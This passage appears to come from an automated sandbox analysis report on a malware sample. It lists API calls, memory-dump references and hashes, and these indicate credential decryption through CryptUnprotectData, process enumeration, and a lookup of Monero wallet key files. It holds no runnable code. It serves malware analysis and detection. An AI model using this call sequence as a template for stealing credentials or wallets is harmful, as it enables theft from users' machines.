                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 120c87e0d7c2dddcc7759363c4c8bbed943b558c1bd3dcf671e6c8a096bcb95b
                                • Instruction ID: 5b2af78e0f2ea2abc37ab0458f36dc082f1ad018d4ce74c246c59fd123460119
                                • Opcode Fuzzy Hash: 120c87e0d7c2dddcc7759363c4c8bbed943b558c1bd3dcf671e6c8a096bcb95b
                                • Instruction Fuzzy Hash: 444172B590421ADFDB50DF90DD89BFEB7B8BB88704F1045A8F509A7280DB745A84CF92
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0093724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00937254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00937281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009372A4
                                • LocalFree.KERNEL32(?), ref: 009372AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 674253222fae27aeebb204c2772d1456dd32b8c132222fe058e3f97564b37465
                                • Instruction ID: 33147c00fbd003904ae1fd2f77b7a965b7fa9ef7bdca0c2a0fcf3959758a5f08
                                • Opcode Fuzzy Hash: 674253222fae27aeebb204c2772d1456dd32b8c132222fe058e3f97564b37465
                                • Instruction Fuzzy Hash: 820112B5A40308BBDB54DFD4CD46F9E77B8EB44701F104554FB09BB2C0DA70AA408B66
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0094961E
                                • Process32First.KERNEL32(00950ACA,00000128), ref: 00949632
                                • Process32Next.KERNEL32(00950ACA,00000128), ref: 00949647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 0094965C
                                • CloseHandle.KERNEL32(00950ACA), ref: 0094967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: e511aa49c065c0ab051ec415a15c063fd464afa51a233f0cf517a4597e3770d7
                                • Instruction ID: 47fd28335aa0f9c1f7755e50bb5227cc65701d1043fd2d67c10ea58bc0c9e2b8
                                • Opcode Fuzzy Hash: e511aa49c065c0ab051ec415a15c063fd464afa51a233f0cf517a4597e3770d7
                                • Instruction Fuzzy Hash: EE011E75A00208EBCB54DFA5CD58FEEB7F8EB48301F104188A909A7240DB349F80CF51
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $`y$7k??$?mM$Bok
                                • API String ID: 0-677361715
                                • Opcode ID: 6087e776b55415b018ce3dd02ebf0c5e4845668a191370baf7fc355df69e5509
                                • Instruction ID: 8073fc4debfa8f370d0dd168e86aff7c39d9b87b0b1e59bc7d8d9a525fbaec70
                                • Opcode Fuzzy Hash: 6087e776b55415b018ce3dd02ebf0c5e4845668a191370baf7fc355df69e5509
                                • Instruction Fuzzy Hash: 2DB2F6F360C204AFE704AE2DEC8567AFBE9EF94720F16493DE6C5C3744EA3558018696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 3p|;$A5{$BxML$,_?
                                • API String ID: 0-2845234193
                                • Opcode ID: 7a10e2ceaa038711be582c71a7a4d2a94e35058a168b6936c91e70a98eaa6c35
                                • Instruction ID: 50adb4a69f3904d51c03f61172ae6fae85e17c02f6401e7d9f69d6e4a3c74645
                                • Opcode Fuzzy Hash: 7a10e2ceaa038711be582c71a7a4d2a94e35058a168b6936c91e70a98eaa6c35
                                • Instruction Fuzzy Hash: 2FB2E5F360C204AFE304AE29EC8567AFBE9EF94720F16493DE6C4C3744EA3558058697
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009505B7), ref: 009486CA
                                • Process32First.KERNEL32(?,00000128), ref: 009486DE
                                • Process32Next.KERNEL32(?,00000128), ref: 009486F3
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • CloseHandle.KERNEL32(?), ref: 00948761
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 9104d46c94413ac1d4c1d8d41cc6ccf83c48da3b0ed2212f6b78a197fed9ffdb
                                • Instruction ID: c0db3ac61baa30b64ca68c6e47b5f43ad4a5354aa8bf47803390946cb90668b5
                                • Opcode Fuzzy Hash: 9104d46c94413ac1d4c1d8d41cc6ccf83c48da3b0ed2212f6b78a197fed9ffdb
                                • Instruction Fuzzy Hash: 95316B71941218ABDB24DF51CC51FEEB778EB84704F104299F50AA22A0DF306E85CFA2
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00935184,40000001,00000000,00000000,?,00935184), ref: 00948EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 97601dd0a685f10225bba29038192af2bf6f371854db14ff2ee3b09f5f4dbc2b
                                • Instruction ID: b0c454eb43ae3b25a8640a229e100861a52c8778d60d643c63b9d0b6c71a4290
                                • Opcode Fuzzy Hash: 97601dd0a685f10225bba29038192af2bf6f371854db14ff2ee3b09f5f4dbc2b
                                • Instruction Fuzzy Hash: 0F111C74200204BFDB40DF64D884FAF33A9AF89700F109948F9198B250DB75EC85DB61
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00934EEE,00000000,?), ref: 00939B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939B2A
                                • LocalFree.KERNEL32(?,?,?,?,00934EEE,00000000,?), ref: 00939B3F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: f5d03cb5e82c999d37bb1abdc8ca510c52d1e89205be04f7c72497b58ed44870
                                • Instruction ID: ada1a477b33d44e9f096b0df03390d0c71fe35856911786cf54b31b79b691ccd
                                • Opcode Fuzzy Hash: f5d03cb5e82c999d37bb1abdc8ca510c52d1e89205be04f7c72497b58ed44870
                                • Instruction Fuzzy Hash: 7611A4B4240208EFEB10CF64DC95FAAB7B9FB89700F208058F9199B390C7B5A941CB51
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00950E00,00000000,?), ref: 009479B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009479B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00950E00,00000000,?), ref: 009479C4
                                • wsprintfA.USER32 ref: 009479F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 83085632a9be067845b6fedfaed6945d02e0287bac3202655499e0543bd91c6c
                                • Instruction ID: b6baafa423281266dd58c911bb491aeb1bebb53e08ec9c32764e1daf1d692b32
                                • Opcode Fuzzy Hash: 83085632a9be067845b6fedfaed6945d02e0287bac3202655499e0543bd91c6c
                                • Instruction Fuzzy Hash: B31115B2904118AACB149FC9DD45BBEB7F8EB88B11F14425AF605A2280E6395940CBB1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,015BF440,00000000,?,00950E10,00000000,?,00000000,00000000), ref: 00947A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00947A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,015BF440,00000000,?,00950E10,00000000,?,00000000,00000000,?), ref: 00947A7D
                                • wsprintfA.USER32 ref: 00947AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: 8f57ae2e6f0dbd163a362fc7fecdea3db1138316b9f3a407beb6b05b16473d8c
                                • Instruction ID: 50b118da1bf3849e81e9c77c857eb64ea3b0c36f2a1756ed2730bec4c5bc88f7
                                • Opcode Fuzzy Hash: 8f57ae2e6f0dbd163a362fc7fecdea3db1138316b9f3a407beb6b05b16473d8c
                                • Instruction Fuzzy Hash: 40118EB1A45218EBEB20CB94DC49FA9B778FB44721F10479AE90A932C0DB745A80CF52
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Jg/T$iS*p$Mw
                                • API String ID: 0-261532386
                                • Opcode ID: 296b2f2d47a90bfe8ba7b3ede8b43a802f466af9994172ea593967cc0ead415e
                                • Instruction ID: 830d6f7daa26b455d358fcdb6ed1ca61f923830ef5057ce14f0443e504e585f3
                                • Opcode Fuzzy Hash: 296b2f2d47a90bfe8ba7b3ede8b43a802f466af9994172ea593967cc0ead415e
                                • Instruction Fuzzy Hash: 6172E6F360C204AFE304AE2DEC8577ABBE9EF94720F1A493DE6C4C3744E97558058696
                                APIs
                                • CoCreateInstance.COMBASE(0094E118,00000000,00000001,0094E108,00000000), ref: 00943758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009437B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: f2cd8cf9135928e127acb0a2a1e0a2bffe0319c048805744080278c4cefa9e69
                                • Instruction ID: 6df142c39ae1bf5fd97cedae1a7830ff1e119302c075277727e8e86e7826a7a0
                                • Opcode Fuzzy Hash: f2cd8cf9135928e127acb0a2a1e0a2bffe0319c048805744080278c4cefa9e69
                                • Instruction Fuzzy Hash: EA41F770A40A289FDB24DB58CC94F9BB7B4BB88702F4081D8E608A7290E7716EC5CF50
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00939B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00939BA3
                                • LocalFree.KERNEL32(?), ref: 00939BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
